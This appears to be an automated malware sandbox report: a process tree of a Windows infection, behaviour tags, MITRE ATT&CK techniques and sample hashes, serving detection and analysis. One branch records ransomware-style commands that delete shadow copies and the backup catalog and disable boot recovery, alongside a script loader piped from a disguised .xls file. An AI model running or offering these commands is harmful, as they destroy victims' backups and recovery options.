C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.com B16⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2248 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.com B17⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5468 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.com B18⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5988 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.com B19⤵PID:6460
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.com B20⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5940 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.com B21⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1564 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.com B22⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:6316 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.com B23⤵PID:2864
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.com B24⤵PID:6876
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.com B25⤵PID:3696
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Uno.exe.com B26⤵PID:6852
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe"7⤵
- Executes dropped EXE
PID:5792 -
C:\Users\Admin\AppData\Local\Temp\is-0PTU5.tmp\5.tmp"C:\Users\Admin\AppData\Local\Temp\is-0PTU5.tmp\5.tmp" /SL5="$102D0,140785,56832,C:\Users\Admin\AppData\Local\Temp\5.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6196 -
C:\Users\Admin\AppData\Local\Temp\5.exe"C:\Users\Admin\AppData\Local\Temp\5.exe" /SILENT9⤵
- Executes dropped EXE
PID:2584 -
C:\Users\Admin\AppData\Local\Temp\is-T52OL.tmp\5.tmp"C:\Users\Admin\AppData\Local\Temp\is-T52OL.tmp\5.tmp" /SL5="$302B2,140785,56832,C:\Users\Admin\AppData\Local\Temp\5.exe" /SILENT10⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6684
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\6.exe"C:\Users\Admin\AppData\Local\Temp\6.exe"7⤵
- Executes dropped EXE
PID:4160 -
C:\Users\Admin\AppData\Local\Temp\6.exe"C:\Users\Admin\AppData\Local\Temp\6.exe" -a8⤵PID:5748
-
-
-
C:\Users\Admin\AppData\Local\Temp\7.exe"C:\Users\Admin\AppData\Local\Temp\7.exe"7⤵
- Executes dropped EXE
PID:7000
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1428
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon00b1849cf0bf91e9.exe4⤵
- Suspicious use of WriteProcessMemory
PID:5304 -
C:\Users\Admin\AppData\Local\Temp\7zS4650C293\Mon00b1849cf0bf91e9.exeMon00b1849cf0bf91e9.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:6092 -
C:\Windows\SysWOW64\dllhost.exedllhost.exe6⤵PID:3560
-
-
C:\Windows\SysWOW64\cmd.execmd /c cmd < Sfaldavano.xls6⤵PID:5636
-
C:\Windows\SysWOW64\cmd.execmd7⤵PID:5804
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^fARmmICHAETEVIAiewsqLILJhRoBwBFrurUNyycHHdHtUkLfezrMoLJHPojHmwGYYPnRONeXFJaxqGOwySnHnTVxzjYWSOiGKIutNTBfsuin$" Serravano.xls8⤵PID:6564
-
-
C:\Windows\SysWOW64\PING.EXEping YJTUIPJF -n 308⤵
- Runs ping.exe
PID:2240
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.comAmica.exe.com Y8⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1944 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com Y9⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4808 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com Y10⤵PID:2604
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com Y11⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:6404 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com Y12⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:6432 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com Y13⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3476 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com Y14⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:772 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com Y15⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1732 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com Y16⤵PID:6604
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com Y17⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5984 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.comC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Amica.exe.com Y18⤵PID:1376
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon00e8b91b250904.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1884
-
-
-
-
C:\Windows\SysWOW64\mstsc.exe"C:\Windows\SysWOW64\mstsc.exe"2⤵
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Modifies Internet Explorer settings
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:908 -
C:\Windows\SysWOW64\cmd.exe/c del "C:\Users\Admin\AppData\Local\Temp\test.exe"3⤵PID:5296
-
-
-
C:\Users\Admin\AppData\Local\Temp\6449.exeC:\Users\Admin\AppData\Local\Temp\6449.exe2⤵
- Suspicious use of SetWindowsHookEx
PID:6712
-
-
C:\Users\Admin\AppData\Local\Temp\6BEB.exeC:\Users\Admin\AppData\Local\Temp\6BEB.exe2⤵PID:5228
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5228 -s 2723⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3952
-
-
-
C:\Users\Admin\AppData\Local\Temp\85DC.exeC:\Users\Admin\AppData\Local\Temp\85DC.exe2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5320
-
-
C:\Users\Admin\AppData\Local\Temp\90F9.exeC:\Users\Admin\AppData\Local\Temp\90F9.exe2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:788
-
-
C:\Users\Admin\AppData\Local\Temp\9540.exeC:\Users\Admin\AppData\Local\Temp\9540.exe2⤵
- Adds Run key to start application
- Enumerates connected drives
PID:496 -
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe" -start3⤵
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2604 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures4⤵PID:4640
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:6460
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\csrss.exe" -agent 04⤵
- Drops file in Program Files directory
- Drops file in Windows directory
PID:6116
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\~temp001.bat4⤵PID:3720
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete5⤵PID:6932
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet4⤵PID:572
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet4⤵PID:6264
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no4⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:796
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete4⤵PID:232
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete5⤵PID:5868
-
-
-
C:\Windows\SysWOW64\notepad.exenotepad.exe4⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4592
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 496 -s 22603⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5944
-
-
-
C:\Users\Admin\AppData\Local\Temp\9C94.exeC:\Users\Admin\AppData\Local\Temp\9C94.exe2⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3492
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:6444
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6444 -s 8763⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2536
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:1164
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:1548
-
C:\Program Files (x86)\P3f8p\rz_vzw.exe"C:\Program Files (x86)\P3f8p\rz_vzw.exe"3⤵PID:4176
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:4164
-
C:\Program Files (x86)\P3f8p\rz_vzw.exe"C:\Program Files (x86)\P3f8p\rz_vzw.exe"3⤵PID:4628
-
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
- Executes dropped EXE
PID:5748 -
C:\Program Files (x86)\P3f8p\rz_vzw.exe"C:\Program Files (x86)\P3f8p\rz_vzw.exe"3⤵PID:3708
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:4076
-
C:\Program Files (x86)\P3f8p\rz_vzw.exe"C:\Program Files (x86)\P3f8p\rz_vzw.exe"3⤵PID:2676
-
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:6604 -
C:\Program Files (x86)\P3f8p\rz_vzw.exe"C:\Program Files (x86)\P3f8p\rz_vzw.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2112
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
- Executes dropped EXE
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:5544 -
C:\Program Files (x86)\P3f8p\rz_vzw.exe"C:\Program Files (x86)\P3f8p\rz_vzw.exe"3⤵PID:3760
-
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:6880
-
C:\Program Files (x86)\P3f8p\rz_vzw.exe"C:\Program Files (x86)\P3f8p\rz_vzw.exe"3⤵PID:4624
-
-
-
C:\Program Files (x86)\P3f8p\rz_vzw.exe"C:\Program Files (x86)\P3f8p\rz_vzw.exe"2⤵PID:2124
-
-
C:\Users\Admin\AppData\Local\Temp\7zS4650C293\Mon00e8b91b250904.exeMon00e8b91b250904.exe1⤵
- Executes dropped EXE
PID:5544
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 5716 -ip 57161⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2912
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5128 -ip 51281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5560
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 5960 -ip 59601⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5332
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 6468 -ip 64681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6188
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 6772 -ip 67721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3264
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Loads dropped DLL
PID:5336 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5336 -s 4522⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:7024
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 6440 -ip 64401⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6476
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:1504
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 608 -p 5544 -ip 55441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5260
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
PID:5036
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 5336 -ip 53361⤵PID:2284
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 720 -ip 7201⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3196
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 2380 -ip 23801⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2808
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 3624 -ip 36241⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6548
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 740 -p 6796 -ip 67961⤵PID:4592
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:6024
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5664
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 6356 -ip 63561⤵PID:6452
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 6432 -ip 64321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3024
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 740 -p 6292 -ip 62921⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
PID:3624
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 704 -p 6812 -ip 68121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6804
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
- Process spawned unexpected child process
PID:6224 -
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:6468 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6468 -s 4523⤵
- Program crash
PID:5544
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 6468 -ip 64681⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6152
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv 2cos33rtfEiT8mSEuIpSVw.0.21⤵PID:4076
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 632 -p 4884 -ip 48841⤵PID:5536
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 5228 -ip 52281⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6936
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 736 -p 2932 -ip 29321⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3972
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 6444 -ip 64441⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6696
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 496 -ip 4961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6220
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵PID:6884
-
C:\Windows\system32\werfault.exewerfault.exe /hc /shared Global\988c9aed7bb94108b085d5a79aa4ebc0 /t 4688 /p 46601⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:6768
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -Embedding1⤵PID:2136
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Disabling Security Tools
1File Deletion
1Modify Registry
3Virtualization/Sandbox Evasion
1Web Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
37c58eb6a1c177de7a43e41645f18f29
SHA198f9c679096c73df78863977a02f90907c799d8d
SHA2566e870d628f0e25fd4229d2d97f649523829773838443dbc3b3ef4f8b53d8ea3a
SHA51268f8ff8020bc414b2371ea34f9afa5a01cdf5876e819751e7250e853be6f0aa7ce874663b15f390ccfe39f23c4342630fe698006164f0805d73b6bd3ab15c20e
-
MD5
37c58eb6a1c177de7a43e41645f18f29
SHA198f9c679096c73df78863977a02f90907c799d8d
SHA2566e870d628f0e25fd4229d2d97f649523829773838443dbc3b3ef4f8b53d8ea3a
SHA51268f8ff8020bc414b2371ea34f9afa5a01cdf5876e819751e7250e853be6f0aa7ce874663b15f390ccfe39f23c4342630fe698006164f0805d73b6bd3ab15c20e
-
MD5
9a3fe714eeef66e4705be33659183eda
SHA19c0a5b8e70d2d9eba71409b77af725b1dc3be26b
SHA256b82aa0fa294ce7acfbfaee6d3d1fbe9a122601e4bdd1c3425d3c3d4e738585bc
SHA5121cbc562025224208e4e5ed366fd9c3b0ae458501566c8420b63245aed4d8d3327c41ba42bf36d64d06c65fb1078dad42d506612cb35b9ec1410e49f6b822bca8
-
MD5
9a3fe714eeef66e4705be33659183eda
SHA19c0a5b8e70d2d9eba71409b77af725b1dc3be26b
SHA256b82aa0fa294ce7acfbfaee6d3d1fbe9a122601e4bdd1c3425d3c3d4e738585bc
SHA5121cbc562025224208e4e5ed366fd9c3b0ae458501566c8420b63245aed4d8d3327c41ba42bf36d64d06c65fb1078dad42d506612cb35b9ec1410e49f6b822bca8
-
MD5
7e2725a7416c6d970eac283dee30438c
SHA1c9bcb54697e3e58bc59e70217fa24c698166208d
SHA25647ad11e0129bc7c5203c95e64484e8b75fbd9acd64971278f5bd5c68089e1508
SHA5123c6b6542c1675c79a4c94c5919ae13a3abed69a802ea74455c0be0766425755b453d7e0676a5a2bf6a73c7ac96cae60ab86c9b4b05d9528cffd475a9480ebe7f
-
MD5
7e2725a7416c6d970eac283dee30438c
SHA1c9bcb54697e3e58bc59e70217fa24c698166208d
SHA25647ad11e0129bc7c5203c95e64484e8b75fbd9acd64971278f5bd5c68089e1508
SHA5123c6b6542c1675c79a4c94c5919ae13a3abed69a802ea74455c0be0766425755b453d7e0676a5a2bf6a73c7ac96cae60ab86c9b4b05d9528cffd475a9480ebe7f
-
MD5
e4540a9019d866f370538bc2644ff151
SHA148d7c12a7b9efc97cdf72d402a87a7dc70174eb8
SHA25654887d68ac29075fb4508b0debf88b534a7b710f94fe68410d39e6a65edfb79b
SHA512cab4ac07eb6a241cbaa24f40383a4c76ca5256b462f2c8250246c39fb3798b33ab66336770aec8dfcc2c070ed9a990460860e3d4d93740735850c6ed942570e5
-
MD5
e4540a9019d866f370538bc2644ff151
SHA148d7c12a7b9efc97cdf72d402a87a7dc70174eb8
SHA25654887d68ac29075fb4508b0debf88b534a7b710f94fe68410d39e6a65edfb79b
SHA512cab4ac07eb6a241cbaa24f40383a4c76ca5256b462f2c8250246c39fb3798b33ab66336770aec8dfcc2c070ed9a990460860e3d4d93740735850c6ed942570e5
-
MD5
3f85c284c00d521faf86158691fd40c5
SHA1ee06d5057423f330141ecca668c5c6f9ccf526af
SHA25628915433217ce96922b912651ae21974beba3a35aab6c228d5e96e296c8925dc
SHA5120458856a88a11d259595c9c9ec105131c155fffb9c039b492e961b6aaf89ecec4e2d057fd6a2305f55303e777e08346a437dc22741ed288fb84d6d37b814d492
-
MD5
3f85c284c00d521faf86158691fd40c5
SHA1ee06d5057423f330141ecca668c5c6f9ccf526af
SHA25628915433217ce96922b912651ae21974beba3a35aab6c228d5e96e296c8925dc
SHA5120458856a88a11d259595c9c9ec105131c155fffb9c039b492e961b6aaf89ecec4e2d057fd6a2305f55303e777e08346a437dc22741ed288fb84d6d37b814d492
-
MD5
e511bb4cf31a2307b6f3445a869bcf31
SHA176f5c6e8df733ac13d205d426831ed7672a05349
SHA25656002017746f61eee8d8e9b5ad2f3cbb119dc99300c5b6d32c1be184d3e25137
SHA5129c81de34bf3b0eb75405c726d641ef6090054e9be8e0c0ab1bb2ed095e6477ce2fa8996868bf8a77a720b210a76b5f4e1b3b086d7f40449d79498681b367199c
-
MD5
57d883f2e96dccb2ca2867cb858151f8
SHA109e0fcd15cc69bcd6a9ef2928c4054d754b1aaa3
SHA256c1dc7829e850ff7189e993b6f2bd3b00d56f3ec062da364e8698fd39e79f0072
SHA5122235866e39dccc8cd524592f6f0b514878bf0c5ad13ee95bd01508766eb789528394bf329faee481d81e3fe389664fb5673d214d478cda58f4293bfe58ba4012
-
MD5
57d883f2e96dccb2ca2867cb858151f8
SHA109e0fcd15cc69bcd6a9ef2928c4054d754b1aaa3
SHA256c1dc7829e850ff7189e993b6f2bd3b00d56f3ec062da364e8698fd39e79f0072
SHA5122235866e39dccc8cd524592f6f0b514878bf0c5ad13ee95bd01508766eb789528394bf329faee481d81e3fe389664fb5673d214d478cda58f4293bfe58ba4012
-
MD5
c0d18a829910babf695b4fdaea21a047
SHA1236a19746fe1a1063ebe077c8a0553566f92ef0f
SHA25678958d664b1c140f2b45e56c4706108eeb5f14756977e2efd3409f8a788d3c98
SHA512cca06a032d8232c0046c6160f47b8792370745b47885c2fa75308abc3df76dcc5965858b004c1aad05b8cd8fbb9a359077be1b97ec087a05d740145030675823
-
MD5
c0d18a829910babf695b4fdaea21a047
SHA1236a19746fe1a1063ebe077c8a0553566f92ef0f
SHA25678958d664b1c140f2b45e56c4706108eeb5f14756977e2efd3409f8a788d3c98
SHA512cca06a032d8232c0046c6160f47b8792370745b47885c2fa75308abc3df76dcc5965858b004c1aad05b8cd8fbb9a359077be1b97ec087a05d740145030675823
-
MD5
c0d18a829910babf695b4fdaea21a047
SHA1236a19746fe1a1063ebe077c8a0553566f92ef0f
SHA25678958d664b1c140f2b45e56c4706108eeb5f14756977e2efd3409f8a788d3c98
SHA512cca06a032d8232c0046c6160f47b8792370745b47885c2fa75308abc3df76dcc5965858b004c1aad05b8cd8fbb9a359077be1b97ec087a05d740145030675823
-
MD5
408f2c9252ad66429a8d5401f1833db3
SHA13829d2d03a728ecd59b38cc189525220a60c05db
SHA256890db580fac738971bc7c714735ff6f1f2ee31edccd7881044da3e98452af664
SHA512d4c89dfd928023b9f4380808b27e032342d2a85963b95bbed3191cc03b455dbc6f5ffecf29828a53b1d9011b3881f1cda9d15d269a2cbcbd4be5c993bcd9643b
-
MD5
408f2c9252ad66429a8d5401f1833db3
SHA13829d2d03a728ecd59b38cc189525220a60c05db
SHA256890db580fac738971bc7c714735ff6f1f2ee31edccd7881044da3e98452af664
SHA512d4c89dfd928023b9f4380808b27e032342d2a85963b95bbed3191cc03b455dbc6f5ffecf29828a53b1d9011b3881f1cda9d15d269a2cbcbd4be5c993bcd9643b
-
MD5
7de877618ab2337aa32901030365b2ff
SHA1adb006662ec67e244d2d9c935460c656c3d47435
SHA256989079a8616a9e5c4f77c0e86b89d170dc7b8c4bf23768111f8e0d60e2c29da7
SHA512b7f9b402baad41e8e9df1db856b2273b64dd603b6c5bae147979fbff215af79b1d261cdd89f0eb050c7ef3db820bb0207decd58fbc7f9a8d4ffb179133a7c8ff
-
MD5
7de877618ab2337aa32901030365b2ff
SHA1adb006662ec67e244d2d9c935460c656c3d47435
SHA256989079a8616a9e5c4f77c0e86b89d170dc7b8c4bf23768111f8e0d60e2c29da7
SHA512b7f9b402baad41e8e9df1db856b2273b64dd603b6c5bae147979fbff215af79b1d261cdd89f0eb050c7ef3db820bb0207decd58fbc7f9a8d4ffb179133a7c8ff
-
MD5
df80b76857b74ae1b2ada8efb2a730ee
SHA15653be57533c6eb058fed4963a25a676488ef832
SHA2565545c43eb14b0519ab997673efa379343f98d2b6b1578d9fdeb369234789f9dd
SHA512060b04536003ce4a91e5847d487701eed7e093408e427198be552f0af37aee498929586f3a0110c78173873a28d95c6c0a4cdd01c7218274f5849a4730f9efdd
-
MD5
df80b76857b74ae1b2ada8efb2a730ee
SHA15653be57533c6eb058fed4963a25a676488ef832
SHA2565545c43eb14b0519ab997673efa379343f98d2b6b1578d9fdeb369234789f9dd
SHA512060b04536003ce4a91e5847d487701eed7e093408e427198be552f0af37aee498929586f3a0110c78173873a28d95c6c0a4cdd01c7218274f5849a4730f9efdd
-
MD5
6dba60503ea60560826fe5a12dced3e9
SHA17bb04d508e970701dc2945ed42fe96dbb083ec33
SHA2568d49f82aaa8eb3dfa5c7d7dffd7efb9dd6b776ef08b8b8c5afc6cb8ab0743865
SHA512837c0f0dc70386ce1d143332e4d273750f64dd7f8be5b4ce79aa39628ceebf27d01e447ed0b9ec6064c6ba9dbaa13a64631c2e136ec99d27c0f4a25681053ff9
